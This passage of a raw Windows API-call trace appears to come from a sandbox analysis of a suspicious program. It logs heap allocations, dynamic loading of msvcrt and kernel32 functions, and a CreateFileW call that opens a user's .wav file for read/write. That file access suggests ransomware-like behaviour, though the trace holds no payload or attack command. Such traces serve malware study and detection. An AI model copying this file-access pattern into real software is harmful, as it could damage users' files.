out: lpsz="byte[100957]") returned 0xc [0182.182] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.182] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0182.182] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.182] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0182.182] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0182.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0182.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0182.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0182.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2658 [0182.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2658, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0182.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0182.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0182.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0182.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0182.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0182.183] FreeLibrary (hLibModule=0x75c90000) returned 1 [0182.183] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0182.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0182.183] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.183] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0182.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0182.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0182.183] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0182.183] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0182.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0182.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0182.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0182.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0182.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0182.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0182.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0182.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0182.186] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0182.186] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0182.186] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0182.186] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0182.186] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0182.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0182.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0182.187] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0182.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0182.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0182.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd600, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0182.187] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\r64i-tkxh1f.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0182.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0182.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0182.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0182.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbe2a70 | out: hHeap=0x8a0000) returned 1 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0182.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0182.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0182.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0182.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0182.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0182.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0182.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0182.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0182.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0182.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0182.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0182.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0182.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0182.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0182.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0182.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0182.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0182.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0182.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0182.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0182.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0182.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0182.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0182.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0182.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0182.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0182.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0182.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0182.190] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0182.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0182.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0182.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0182.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0182.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0182.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0182.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0182.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0182.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0182.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0182.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0182.192] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0182.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0182.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0182.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0182.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0182.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0182.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0182.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0182.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0182.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 